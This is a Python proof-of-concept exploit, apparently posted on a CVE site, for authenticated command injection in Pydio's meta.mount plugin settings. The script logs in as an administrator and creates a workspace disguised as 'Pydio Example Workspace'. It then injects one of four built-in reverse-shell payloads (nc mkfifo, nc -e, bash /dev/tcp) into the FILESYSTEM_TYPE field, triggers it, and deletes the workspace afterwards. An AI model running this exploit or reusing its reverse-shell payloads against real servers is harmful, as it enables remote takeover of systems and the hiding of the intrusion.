4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
"""
This is an exploit for a vulnerability that I discovered in the Pydio Filesystem Manager.
The vulnerability allows for remote code execution through command injection in a 
particular setting field when attaching a specific plugin to a filesystem workspace. 
The prerequisite for exploiting this vulnerability is having credentials to a Pydio 
administrator account. 

Only use this on systems that you have explicit permission to test.
"""

import uuid
import urllib
import argparse
import requests

# Verbosity switch read by the helpers below: when True they print extra
# progress lines and the raw status code / body of each response.
DEBUG = False
# Default marker that process_request looks for in a 200 response body to
# decide the request was refused.
FAIL_ACCESS_STRING = "You are not allowed to access this resource"

def parse_token(response_text, token_type):
    """Pull a token out of a raw response body.

    token_type selects the extraction rule:
      * "client_id"    - take the 34 characters following the
                         '"SECURE_TOKEN":' marker and strip double quotes.
      * "secure_token" - take the second-to-last piece of the body when it
                         is split on double quotes.

    Returns the extracted string. Any other token_type, an empty result, or
    a parsing error prints a diagnostic and terminates with exit code 1.
    """
    if DEBUG:
        print(f"[*] parsing {token_type} from response")

    # Reject unknown selectors up front; exit() is not an Exception subclass,
    # so this behaves the same inside or outside the try block.
    if token_type not in ("client_id", "secure_token"):
        print("  [!] select correct token to parse ('client_id' or 'secure_token')")
        exit(1)

    try:
        if token_type == "client_id":
            after_marker = response_text.split("\"SECURE_TOKEN\":")[1]
            token = after_marker[:34].replace("\"", "")
        else:
            quoted_pieces = response_text.split("\"")
            token = quoted_pieces[-2]
        if not token:
            # empty token: funnel into the shared error report below
            raise Exception
        return token
    except Exception as err:
        print("  [!] could not parse token, check response text:")
        print(f"{err}")
        print(response_text)
        exit(1)

def process_request(session, request_type, message, headers=None, params=None, data=None,
                    success=None, loud=False, timeout=15, failure_string=None):
    """Send one GET or POST to the module-level URL and vet the response.

    Parameters:
        session:        requests session used to prepare and send the request.
        request_type:   "get" or "post" (case-insensitive); anything else
                        prints an error and exits.
        message:        short label used in progress and error output.
        headers/params/data: passed straight through to requests.Request.
        success:        optional substring that must appear in a 200 body.
        loud:           when true, print the label before sending and a
                        success line afterwards.
        timeout:        seconds passed to session.send.
        failure_string: substring that marks a refused request in a 200 body;
                        defaults to FAIL_ACCESS_STRING.

    Returns:
        The response object for a 200 that passed the checks, or for a 204.
        None when the read timed out - callers that dereference the result
        must be prepared for that.

    Exits with status 1 on a connection error, on any status other than
    200/204, on a missing success marker, or when failure_string is found.
    """
    if loud:
        print(f"[*] {message}")
    if request_type.lower() not in ("get", "post"):
        # fixed: the original message never closed its parenthesis
        print(f"  [!] incorrect request type ({request_type})")
        exit(1)

    # URL is a module-level global assigned in main(); it is only read here.
    req = requests.Request(
        request_type,
        URL,
        headers=headers,
        params=params,
        data=data,
    )
    prepared_req = session.prepare_request(req)
    try:
        response = session.send(prepared_req, timeout=timeout)
    except requests.exceptions.ReadTimeout:
        # a read timeout is reported to the caller as "no response"
        return None
    except requests.exceptions.ConnectionError:
        print("  [!] couldn't connect to target ({})".format(URL))
        print("      do you have the right IP/URI/port?")
        exit(1)

    if DEBUG:
        print(response.status_code)
        print(response.text)

    if response.status_code == 204:
        # not fatal here: the response is handed back for the caller to judge
        print(f"  [!] error sending {message} request ({response.status_code})")
        print("      usually means we don't have permissions. this will be")
        print("      handled contextually.")
        return response

    if response.status_code != 200:
        print(f"  [!] error sending {message} request ({response.status_code})")
        exit(1)

    # An empty or None success marker disables the success check.
    if success and success not in response.text:
        print(f"  [!] success condition not met for {message} request")
        print(f"    [*] required {success} in response")
        exit(1)

    if failure_string is None:
        failure_string = FAIL_ACCESS_STRING
    if failure_string in response.text:
        print(f"  [!] access failure on {URL}")
        print(f"    [*] type:\t\t{request_type}")
        print(f"    [*] url:\t\t{URL}")
        print(f"    [*] headers:\t{headers}")
        print(f"    [*] params:\t\t{params}")
        print(f"    [*] data:\t\t{data}")
        exit(1)

    if loud:
        print("  [+] success")
    return response


def get_secure_token(live_session):
    """Fetch the base URL with browser-style headers and return the token
    that parse_token extracts from the body in "client_id" mode."""
    browser_headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Encoding": "gzip, deflate, br",
        "Accept-Language": "en-US,en;q=0.5",
        "Connection": "keep-alive",
        "DNT": "1",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0"
    }
    landing_page = process_request(
        live_session,
        "get",
        "grabbing client_id",
        headers=browser_headers,
    )
    return parse_token(landing_page.text, "client_id")

def login(live_session, client_id):
    """Authenticate live_session and return the post-login token.

    Three requests are sent in order, each carrying client_id as
    "secure_token": a directory listing GET, a "get_seed" POST whose body is
    used as the login seed, and the "login" POST with the module-level
    USERNAME / PASSWORD. The token is parsed from the last response; the
    session object itself is not returned.
    """
    listing_query = {
        "dir": "/",
        "get_action": "ls",
        "options": "al",
        "secure_token": client_id
    }
    process_request(live_session, "get", "staging login", params=listing_query, loud=DEBUG)

    seed_form = {
        "get_action": "get_seed",
        "secure_token": client_id
    }
    seed_response = process_request(
        live_session, "post", "seed setup", data=seed_form, loud=DEBUG
    )

    credentials_form = {
        "get_action": "login",
        "login_seed": seed_response.text,
        "userid": USERNAME,
        "password": PASSWORD,
        "secure_token": client_id
    }
    login_response = process_request(
        live_session, "post", "login POST", data=credentials_form, loud=DEBUG
    )
    return parse_token(login_response.text, "secure_token")

def create_exploit_workspace(live_session, client_id, secure_token):
    """Create a filesystem-driver workspace and return its name and id.

    Posts a "create_repository" action whose "json_data" field is the
    hand-assembled JSON string below, and requires the text
    "Successfully created workspace" in the response. The workspace id is
    taken from the response body as the text between 'file="' and the next
    double quote.

    client_id is accepted but not used in this function.

    Returns:
        dict with keys "name" (the display name) and "id" (the parsed id).
    Exits with status 1 if the id cannot be parsed.
    """
    exploit_workspace_name = "Pydio Example Workspace"
    exploit_workspace_description = "This is an example workspace provided by pydio. " + \
        "You may delete this workspace if you would like."
    # NOTE(review): exploit_path is computed but never referenced again in this
    # function; the "PATH" value in the JSON below is a fixed literal.
    exploit_path = str(uuid.uuid4()) # this is the folder it maps to on disk
    # JSON body is built by string concatenation; the description and display
    # name are interpolated without escaping.
    new_workspace_data = "{\"DRIVER\":\"fs\",\"DRIVER_OPTIONS\":{" + \
        f"\"USER_DESCRIPTION\":\"{exploit_workspace_description}\"," + \
        "\"CREATE\":true,\"CHMOD_VALUE\":\"0666\"," + \
        "\"RECYCLE_BIN\":\"recycle_bin\",\"PAGINATION_THRESHOLD\":500,\"PAGINATION_NUMBER\"" + \
        ":200,\"REMOTE_SORTING\":true,\"REMOTE_SORTING_DEFAULT_COLUMN\":\"ajxp_label\"," + \
        "\"REMOTE_SORTING_DEFAULT_DIRECTION\":\"asc\",\"UX_DISPLAY_DEFAULT_MODE\":\"list\"," + \
        "\"UX_SORTING_DEFAULT_COLUMN\":\"natural\",\"UX_SORTING_DEFAULT_DIRECTION\":\"asc\"," + \
        "\"PATH\":\"/tmp/somewherenew\"}," + \
        f"\"DISPLAY\":\"{exploit_workspace_name}" + \
        "\"}"
    get_id = process_request(
        live_session,
        "post",
        "creating new workspace to poison",
        data={
            "get_action": "create_repository",
            "json_data": new_workspace_data,
            "secure_token": secure_token
        },
        success="Successfully created workspace",
        loud=True
    )
    # splits <<< regex , but w.e.
    try:
        workspace_id = get_id.text.split("file=\"")[1].split("\"")[0]
    # NOTE(review): bare except also traps KeyboardInterrupt/SystemExit raised
    # inside the try body; consider narrowing to the parsing errors.
    except:
        print("  [!] error parsing workspace ID ... ")
        print("      this didn't come up in testing")
        print("      you've gotta modify source to get this fixed :X")
        print("      RIP skids")
        exit(1)
    return {"name": exploit_workspace_name, "id": workspace_id}

def delete_exploit_workspace(live_session, client_id, secure_token, workspace):
    """Delete the repository whose id is workspace["id"].

    Sends a "delete" action for data type "repository" and requires
    "Successfully deleted workspace" in the response. client_id is accepted
    but not used.
    """
    delete_form = {
        "get_action": "delete",
        "data_type": "repository",
        "data_id": workspace["id"],
        "secure_token": secure_token,
    }
    process_request(
        live_session,
        "post",
        "deleting our created exploit workspace",
        data=delete_form,
        success="Successfully deleted workspace",
        loud=True,
    )

def pre_injection_staging(live_session, client_id, secure_token):
    """Switch the session to the "ajxp_conf" repository.

    The request is treated as refused when the response contains
    "Cannot access to workspace". client_id is accepted but not used.
    """
    switch_form = {
        "get_action": "switch_repository",
        "repository_id": "ajxp_conf",
        "secure_token": secure_token,
    }
    process_request(
        live_session,
        "post",
        "staging injection",
        data=switch_form,
        failure_string="Cannot access to workspace",
        loud=DEBUG,
    )

def get_payload():
    """Return the command string to use, based on module-level globals.

    Reads LISTENER_IP, LISTENER_PORT and PAYLOAD. If PAYLOAD is truthy and
    matches a key of the table below, the matching template is returned;
    if it is truthy but not a key, PAYLOAD itself is returned unchanged.
    When PAYLOAD is falsy, entry "1" is returned.
    """
    # selects the payload from one of our pre-built ones, or a custom specified
    # Keys are strings because PAYLOAD is compared as given on the command line.
    prebuilt_payloads = {
        "1": f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {LISTENER_IP} {LISTENER_PORT} >/tmp/f",
        "2": f"nc -e /bin/bash {LISTENER_IP} {LISTENER_PORT}",
        "3": f"/bin/bash -c '/bin/bash -i >& /dev/tcp/{LISTENER_IP}/{LISTENER_PORT} 0>&1'",
        "4": f"/bin/bash -c '/bin/bash &>/dev/tcp/{LISTENER_IP}/{LISTENER_PORT} <&1'"
    }
    if PAYLOAD:
        try:
            return prebuilt_payloads[PAYLOAD]
        except KeyError:
            # not a preset key: treat the value as a user-supplied command
            return PAYLOAD
    else:
        return prebuilt_payloads["1"]

def inject_exploit(live_session, client_id, secure_token, workspace):
    """Send the three "edit" requests that attach the meta.mount settings
    to the workspace identified by workspace["id"].

    The steps run in list order: "edit_repository", "meta_source_edit"
    (carrying the JSON string built below as "bulk_data"), then
    "edit_repository_data". Each goes through process_request, which exits
    the program if a step's success marker is missing.

    client_id is accepted but not used in this function.
    """
    # if we haven't set a custom payload, fire off a default nc rev shell
    # NOTE(review): these globals are declared but not assigned or read
    # directly in this function; get_payload() reads them itself.
    global LISTENER_IP, LISTENER_PORT
    selected_payload = get_payload()
    # Hand-built JSON; selected_payload is interpolated without escaping.
    # NOTE(review): the "add" object repeats the "FILESYSTEM_TYPE" key.
    encoded_injection = "{\"delete\":{},\"add\":{\"meta.mount\":{\"FILESYSTEM_TYPE\":\"cifs\"," + \
          "\"FILESYSTEM_TYPE\":\"cifs\",\"MOUNT_OPTIONS\":\"user=AJXP_USER,pass=AJXP_PASS" + \
          ",uid=AJXP_SERVER_UID,gid=AJXP_SERVER_GID\",\"MOUNT_RESULT_SUCCESS\":\"32\"," + \
          "\"USE_AUTH_STREAM\":\"true\"}},\"edit\":{\"meta.mount\":{" + \
          f"\"FILESYSTEM_TYPE\":\"cifs;{selected_payload};mount -t cifs\"," + \
          "\"MOUNT_OPTIONS\":\"user=AJXP_USER,pass=AJXP_PASS,uid=AJXP_SERVER_UID,gid=AJXP_SERVER_GID\"," + \
          "\"MOUNT_RESULT_SUCCESS\":\"32\",\"USE_AUTH_STREAM\":\"true\",\"UNC_PATH\":\"//127.0.0.1/test\"," + \
          "\"MOUNT_POINT\":\"/tmp/somewhere\",\"USER\":\"admin\",\"PASS\":\"password\"}}}"

    # Ordered request descriptions; each entry is replayed by the loop below.
    injection = [
        {
            "message": "editing repository",
            "request_type": "post",
            "params": {
                "get_action": "edit",
                "sub_action": "edit_repository",
                "repository_id": workspace["id"],
                "secure_token": secure_token
            },
            # empty marker: process_request skips the success check when falsy
            "success": "",
            "loud": DEBUG
        },
        {
            "message": "poisoning plugin",
            "request_type": "post",
            "params": {
                "get_action": "edit",
                "sub_action": "meta_source_edit",
                "repository_id": workspace["id"],
                "bulk_data": encoded_injection,
                "secure_token": secure_token
            },
            "success": "Successfully edited meta source",
            "loud": DEBUG
        },
        {
            "message": "poisoning workspace",
            "request_type": "post",
            "params": {
                "get_action": "edit",
                "sub_action":"edit_repository_data",
                "repository_id": workspace["id"],
                "secure_token": secure_token
            },
            "success": "Successfully edited workspace",
            "loud": DEBUG
        },
    ]
    # Values travel as URL query parameters (params=), not as a form body.
    for injection_step in injection:
        process_request(
            live_session,
            injection_step["request_type"],
            injection_step["message"],
            params=injection_step["params"],
            success=injection_step["success"],
            loud=injection_step["loud"]
        )

def check_injection(live_session, client_id, secure_token, workspace):
    """Re-read the workspace settings and report whether they were changed.

    Issues the "edit_repository" query for workspace["id"] and returns True
    when the module-level LISTENER_IP string appears in the response text,
    False otherwise, printing the outcome either way. client_id is accepted
    but not used.
    """
    settings_query = {
        "get_action": "edit",
        "sub_action": "edit_repository",
        "repository_id": workspace["id"],
        "secure_token": secure_token,
    }
    settings_page = process_request(
        live_session,
        "post",
        "confirming injection",
        params=settings_query,
        loud=DEBUG,
    )
    print("[*] did we inject our poisoned plugin?")
    # probably a safe bet: the listener address is used as the marker
    if LISTENER_IP in settings_page.text:
        print("  [+] payload injected :)")
        return True
    print("  [!] nope..the plugin wasn't added :(")
    return False

def trigger_exploit(live_session, secure_token, workspace):
    """Send a "switch_repository" request for workspace["id"].

    A 1-second timeout is used and the result of process_request is
    discarded, so a read timeout here is not treated as an error.
    """
    switch_query = {
        "get_action": "switch_repository",
        "repository_id": workspace["id"],
        "secure_token": f"{secure_token}",
    }
    process_request(
        live_session,
        "post",
        "triggering exploit",
        params=switch_query,
        loud=DEBUG,
        timeout=1,
    )

def initialize_parser():
    """Build the command-line parser for this script.

    Five options are mandatory (-t, -u, -p, -L, -P) and are listed under a
    "required arguments" group in the help output; --payload is optional
    and defaults to None. All values are kept as strings.

    Returns:
        argparse.ArgumentParser: the configured parser (nothing is parsed here).
    """
    parser = argparse.ArgumentParser(description='[*] exploit some pydio boxes (academically)')
    required_group = parser.add_argument_group(title='required arguments')

    # (flag, destination attribute, help text) for every mandatory option
    required_options = (
        ('-t', 'target',
         'this is the target URI for the pydio instance..i.e. http://127.0.0.1:31337/pydio/'),
        ('-u', 'username', 'this is the username of the admin user'),
        ('-p', 'password', 'this is the password of the admin user'),
        ('-L', 'listener_ip', 'IP address to catch reverse shell on'),
        ('-P', 'listener_port', 'port to catch reverse shell on'),
    )
    for flag, dest, help_text in required_options:
        required_group.add_argument(flag, dest=dest, required=True, help=help_text)

    # fixed: the help used to advertise a fifth preset, but only presets
    # "1" through "4" are defined in this file
    parser.add_argument(
        '--payload',
        dest='payload',
        default=None,
        type=str,
        help='one of the pre-built reverse-shell payloads (1, 2, 3, or 4), or a ' + \
            'custom command. keep in mind you can\'t use the (\") character as it ' + \
            'breaks the injection'
    )
    return parser

def process_target(target):
    """Return target with exactly one trailing slash guaranteed.

    A value that already ends in "/" is returned unchanged; otherwise "/" is
    appended. Uses str.endswith so an empty string no longer raises
    IndexError (it yields "/").
    """
    # add / to the URI if it doesn't terminate with /..because otherwise things get weird
    if not target.endswith("/"):
        target += "/"
    return target

def main():
    """Parse the command line, publish the values as module globals, and run
    the request sequence end to end.

    Order of operations: obtain a token and log in, switch to the settings
    repository, create a workspace, apply and verify the settings change,
    send the triggering request if verification passed, then log in again
    on a fresh session and delete the workspace. Ctrl-C at any point prints
    a notice and exits with status 1.
    """
    parser = initialize_parser()
    args = parser.parse_args()
    # set globals because i'm a filthy person
    global URL, USERNAME, PASSWORD, LISTENER_IP, LISTENER_PORT, PAYLOAD
    URL = process_target(args.target)
    USERNAME = args.username
    PASSWORD = args.password
    LISTENER_IP = args.listener_ip
    LISTENER_PORT = args.listener_port
    PAYLOAD = args.payload
    try:
        # NOTE(review): the password is echoed to stdout in clear text.
        print("[*] exploit credentials")
        print(f"\tusername: '{USERNAME}'\n\tpassword: '{PASSWORD}'")
        live_session = requests.Session()
        client_id = get_secure_token(live_session)
        secure_token = login(live_session, client_id)
        pre_injection_staging(live_session, client_id, secure_token)
        exploit_workspace = create_exploit_workspace(live_session, client_id, secure_token)
        print("[*] trying to exploit workspace ({}) [{}]".format(exploit_workspace["name"], exploit_workspace["id"]))
        inject_exploit(live_session, client_id, secure_token, exploit_workspace)
        if check_injection(live_session, client_id, secure_token, exploit_workspace):
            print("[*] triggering exploit\n")
            print("[*][~][*][~][*][~][*]     !  brace for shell !     [*][~][*][~][*][~][*]")
            print("[*][~][*][~][*][~][*]     !  brace for shell !     [*][~][*][~][*][~][*]")
            print("[*][~][*][~][*][~][*]     !  brace for shell !     [*][~][*][~][*][~][*]")
            trigger_exploit(live_session, secure_token, exploit_workspace)
            print("\n... did you catch it ???\n")
        else:
            print("  [!] injection failed...boo :( (also shouldn't ever happen)")
        # Cleanup runs on a brand-new session with a fresh login.
        # NOTE(review): helpers call exit(1) on failure, so this cleanup is
        # skipped whenever an earlier step aborts.
        print("[*] cleaning up after ourselves")
        live_session = requests.Session()
        client_id = get_secure_token(live_session)
        secure_token = login(live_session, client_id)
        pre_injection_staging(live_session, client_id, secure_token)
        delete_exploit_workspace(live_session, client_id, secure_token, exploit_workspace)
        print("[+] done :)")

    except KeyboardInterrupt:
        print("\n  [!] keyboard interrupt detected...exiting")
        exit(1)

# Run the command-line flow only when executed as a script, not on import.
if __name__ == "__main__":
    main()